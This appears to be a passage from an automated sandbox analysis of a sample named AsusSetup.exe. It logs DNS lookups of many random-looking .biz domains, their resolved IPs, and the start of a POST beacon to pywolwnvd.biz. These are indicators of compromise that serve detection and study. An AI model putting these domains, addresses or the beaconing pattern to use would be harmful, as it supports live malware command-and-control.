                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.315362930 CET192.168.2.41.1.1.10x68ecStandard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.996640921 CET192.168.2.41.1.1.10xc544Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.086139917 CET192.168.2.41.1.1.10x5d1cStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.044686079 CET192.168.2.41.1.1.10xaf5fStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.910712957 CET192.168.2.41.1.1.10x7563Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.762322903 CET192.168.2.41.1.1.10x91f7Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.443490028 CET192.168.2.41.1.1.10xa6d5Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.248677969 CET192.168.2.41.1.1.10x2708Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.257546902 CET192.168.2.41.1.1.10x1d80Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.685652971 CET192.168.2.41.1.1.10xc625Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.370913982 CET192.168.2.41.1.1.10x8565Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.847146034 CET192.168.2.41.1.1.10x47e9Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.026891947 CET192.168.2.41.1.1.10xb52eStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.429688931 CET192.168.2.41.1.1.10x169eStandard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.328474998 CET192.168.2.41.1.1.10x2782Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.035124063 CET192.168.2.41.1.1.10xb361Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.198080063 CET192.168.2.41.1.1.10xd9f4Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.050115108 CET192.168.2.41.1.1.10x8638Standard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.047629118 CET192.168.2.41.1.1.10x84f3Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.121606112 CET1.1.1.1192.168.2.40xac5cNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.269409895 CET1.1.1.1192.168.2.40xb4ddNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.319415092 CET1.1.1.1192.168.2.40xd859No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.245568991 CET1.1.1.1192.168.2.40x3feeNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.769892931 CET1.1.1.1192.168.2.40xbd87No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.728605986 CET1.1.1.1192.168.2.40x8881No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.927951097 CET1.1.1.1192.168.2.40xe506No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.907440901 CET1.1.1.1192.168.2.40x1700No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.091811895 CET1.1.1.1192.168.2.40x7f2cNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.091811895 CET1.1.1.1192.168.2.40x7f2cNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.574750900 CET1.1.1.1192.168.2.40xfc06Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.584322929 CET1.1.1.1192.168.2.40xb063No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.201389074 CET1.1.1.1192.168.2.40xa4e5Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.209506035 CET1.1.1.1192.168.2.40x8f5cName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.220756054 CET1.1.1.1192.168.2.40xf59dNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.421147108 CET1.1.1.1192.168.2.40x4916No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.519412041 CET1.1.1.1192.168.2.40xebe5No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.334454060 CET1.1.1.1192.168.2.40xf858No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.886341095 CET1.1.1.1192.168.2.40x16c8No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.667464972 CET1.1.1.1192.168.2.40x2f3cNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.294538021 CET1.1.1.1192.168.2.40xf3b9No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.294538021 CET1.1.1.1192.168.2.40xf3b9No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.846508980 CET1.1.1.1192.168.2.40xe512No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.971065044 CET1.1.1.1192.168.2.40xcbfdNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.787955999 CET1.1.1.1192.168.2.40xe309No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.794147015 CET1.1.1.1192.168.2.40xe206No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.433351994 CET1.1.1.1192.168.2.40xaa55No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.251792908 CET1.1.1.1192.168.2.40x90cbNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.618130922 CET1.1.1.1192.168.2.40xc1b2No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.618159056 CET1.1.1.1192.168.2.40xc1b2No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.680011988 CET1.1.1.1192.168.2.40x8da2No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.494144917 CET1.1.1.1192.168.2.40x6fe5No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.494144917 CET1.1.1.1192.168.2.40x6fe5No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.725990057 CET1.1.1.1192.168.2.40x5e28No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.799467087 CET1.1.1.1192.168.2.40x1b31No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.894359112 CET1.1.1.1192.168.2.40x3632No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.198309898 CET1.1.1.1192.168.2.40x3182No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.275422096 CET1.1.1.1192.168.2.40xcfcbNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.027291059 CET1.1.1.1192.168.2.40x5982No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.986701965 CET1.1.1.1192.168.2.40xb50bNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.980597973 CET1.1.1.1192.168.2.40x188aNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.701518059 CET1.1.1.1192.168.2.40x4473No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.756433964 CET1.1.1.1192.168.2.40x4da2No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.726793051 CET1.1.1.1192.168.2.40x9672No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.514970064 CET1.1.1.1192.168.2.40x3dabNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.073811054 CET1.1.1.1192.168.2.40xae0eNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.372435093 CET1.1.1.1192.168.2.40xc6a9No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.397151947 CET1.1.1.1192.168.2.40x5acaNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.226758003 CET1.1.1.1192.168.2.40x5f9No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.550136089 CET1.1.1.1192.168.2.40x15c7No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.748645067 CET1.1.1.1192.168.2.40x819fNo error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.919111013 CET1.1.1.1192.168.2.40xac5No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.110955954 CET1.1.1.1192.168.2.40x5e01No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.793451071 CET1.1.1.1192.168.2.40xf5c5No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.560046911 CET1.1.1.1192.168.2.40xd174No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.210469961 CET1.1.1.1192.168.2.40xb380No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.785109043 CET1.1.1.1192.168.2.40xc405No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.493058920 CET1.1.1.1192.168.2.40xefb7No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.785861969 CET1.1.1.1192.168.2.40x928dNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.784235954 CET1.1.1.1192.168.2.40x6262No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.260490894 CET1.1.1.1192.168.2.40x2adNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.003324986 CET1.1.1.1192.168.2.40x7b63No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.691201925 CET1.1.1.1192.168.2.40xd413No error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.573965073 CET1.1.1.1192.168.2.40xd1d6No error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.199928045 CET1.1.1.1192.168.2.40x7388No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.109776974 CET1.1.1.1192.168.2.40xb1b4No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.102504015 CET1.1.1.1192.168.2.40x47e3No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.814157963 CET1.1.1.1192.168.2.40x2c38No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.082681894 CET1.1.1.1192.168.2.40xf645No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.565340996 CET1.1.1.1192.168.2.40xfa26No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.740974903 CET1.1.1.1192.168.2.40x1467No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.174402952 CET1.1.1.1192.168.2.40x8c62No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.632183075 CET1.1.1.1192.168.2.40x22dbNo error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.495934963 CET1.1.1.1192.168.2.40x71c7No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.464612961 CET1.1.1.1192.168.2.40x7d6dNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.323558092 CET1.1.1.1192.168.2.40x68ecNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.099559069 CET1.1.1.1192.168.2.40xc544No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.197026968 CET1.1.1.1192.168.2.40x5d1cNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.054071903 CET1.1.1.1192.168.2.40xaf5fNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.920118093 CET1.1.1.1192.168.2.40x7563No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.770437002 CET1.1.1.1192.168.2.40x91f7No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.542237997 CET1.1.1.1192.168.2.40xa6d5No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.265923977 CET1.1.1.1192.168.2.40x1d80No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.693552017 CET1.1.1.1192.168.2.40xc625No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.378562927 CET1.1.1.1192.168.2.40x8565No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.856312037 CET1.1.1.1192.168.2.40x47e9No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.036345959 CET1.1.1.1192.168.2.40xb52eNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.036345959 CET1.1.1.1192.168.2.40xb52eNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.438015938 CET1.1.1.1192.168.2.40x169eNo error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.336643934 CET1.1.1.1192.168.2.40x2782No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.043911934 CET1.1.1.1192.168.2.40xb361No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.206911087 CET1.1.1.1192.168.2.40xd9f4No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.057800055 CET1.1.1.1192.168.2.40x8638No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.056907892 CET1.1.1.1192.168.2.40x84f3No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                        • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                        • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                        • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                        • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                        • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                        • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                        • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                        • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                        • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                        • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                        • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                        • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                        • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                        • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                        • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                        • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                        • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                        • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                        • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                        • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                        • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                        • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                        • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                        • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                        • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                        • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                        • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                        • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                        • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                        • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                        • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                        • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                        • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                        • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                        • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                        • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                        • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                        • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                        • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                        • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                        • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                        • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                        • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                        • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                        • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rffxu.biz

                                                                                                                                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.44973054.244.188.177806452C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395920038 CET353OUTPOST /tqhhuuvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 798
